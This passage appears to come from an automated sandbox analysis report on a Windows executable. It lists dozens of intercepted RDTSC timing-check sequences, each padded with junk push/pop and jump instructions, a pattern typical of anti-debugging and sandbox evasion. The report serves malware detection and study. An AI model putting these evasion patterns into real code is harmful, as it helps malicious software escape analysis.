              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F97D second address: F0F985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F985 second address: F0F9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F08BA1E3Fh 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e popad 0x0000000f push esi 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0FEC8 second address: F0FED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7F08F64186h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F16497 second address: F164C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jmp 00007F7F08BA1E43h 0x0000000b jnc 00007F7F08BA1E36h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7F08BA1E3Eh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F164C7 second address: F164CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F16B50 second address: F16B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1ABCF second address: F1ABE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F7F08F64186h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1ABE1 second address: F1ABFC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7F08BA1E3Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jne 00007F7F08BA1E36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A3BD second address: F1A3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A3C6 second address: F1A3CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A3CC second address: F1A3D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A3D2 second address: F1A3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E48h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A91E second address: F1A924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A924 second address: F1A928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A928 second address: F1A92C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A92C second address: F1A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2156D second address: F2159A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7F08F64186h 0x0000000a popad 0x0000000b jng 00007F7F08F641A2h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2159A second address: F215A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F215A0 second address: F215AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F08F64186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F215AA second address: F215B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F21722 second address: F21730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F21730 second address: F2175C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7F08BA1E46h 0x0000000b popad 0x0000000c jc 00007F7F08BA1E3Ah 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F219B6 second address: F219BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F219BB second address: F219C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7F08BA1E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F221E4 second address: F221F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08F6418Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F22469 second address: F2246D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2246D second address: F22471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F22471 second address: F2247F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2247F second address: F224B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F08F64199h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2304F second address: F2305E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F7F08BA1E3Ah 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F26B1B second address: F26B3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F08F64195h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F27102 second address: F27106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F27106 second address: F2713B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F7F08F64197h 0x0000000f jc 00007F7F08F64186h 0x00000015 pop esi 0x00000016 js 00007F7F08F6418Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E6EEE9 second address: E6EEF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E6EEF0 second address: E6EEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F7F08F64186h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E6EEFD second address: E6EF01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F32211 second address: F3223A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08F64196h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F7F08F64186h 0x00000012 ja 00007F7F08F64186h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F31D35 second address: F31D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F31D3B second address: F31D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F31D3F second address: F31D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F08BA1E40h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F31D54 second address: F31D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F31D5A second address: F31DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7F08BA1E48h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jg 00007F7F08BA1E36h 0x00000018 jmp 00007F7F08BA1E3Dh 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f jmp 00007F7F08BA1E45h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F31DAE second address: F31DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7F08F64186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F31DB8 second address: F31DC2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7F08BA1E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F380D8 second address: F380DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F380DC second address: F380F7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7F08BA1E3Ch 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F380F7 second address: F38133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7F08F64192h 0x0000000b jmp 00007F7F08F6418Ch 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7F08F6418Fh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F38133 second address: F38149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E3Fh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F38149 second address: F3816A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F7F08F64196h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F47E95 second address: F47E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F47E99 second address: F47EB1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7F08F64186h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F7F08F64186h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F4B541 second address: F4B562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F08BA1E48h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F4B6C7 second address: F4B6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F4B6D0 second address: F4B6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F08BA1E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F4B6DA second address: F4B6F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F7F08F64191h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F4B6F4 second address: F4B6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F4FE59 second address: F4FE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F4FBA6 second address: F4FBAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F57B6A second address: F57B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F57B70 second address: F57B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007F7F08BA1E3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F57B85 second address: F57B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F57B89 second address: F57BBF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F08BA1E36h 0x00000008 jmp 00007F7F08BA1E3Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F7F08BA1E45h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F7F08BA1E3Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F57BBF second address: F57BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jns 00007F7F08F64186h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F57BCE second address: F57BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7F08BA1E47h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F57BEC second address: F57C05 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F08F6419Bh 0x00000008 jmp 00007F7F08F6418Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F5F97B second address: F5F989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F7F08BA1E36h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F61091 second address: F610BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jo 00007F7F08F64186h 0x0000000d js 00007F7F08F64186h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7F08F64193h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F610BA second address: F610BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F67D41 second address: F67D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08F64195h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F67D5B second address: F67D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F67D60 second address: F67D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08F6418Bh 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F67D73 second address: F67DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F7F08BA1E3Bh 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F7F08BA1E45h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F67F3B second address: F67F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F67F46 second address: F67F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F67F4A second address: F67F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F67F54 second address: F67F74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F68128 second address: F68132 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7F08F64186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F68132 second address: F6813C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6813C second address: F68142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6845B second address: F68463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F68463 second address: F68467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F685DD second address: F685E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F685E1 second address: F685E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F68845 second address: F6884D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6884D second address: F68860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F7F08F64186h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F68860 second address: F68864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F68864 second address: F68868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F68868 second address: F68877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6D2F8 second address: F6D30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08F64190h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6D30C second address: F6D310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6D310 second address: F6D316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6D316 second address: F6D321 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6CF00 second address: F6CF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6CF04 second address: F6CF0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
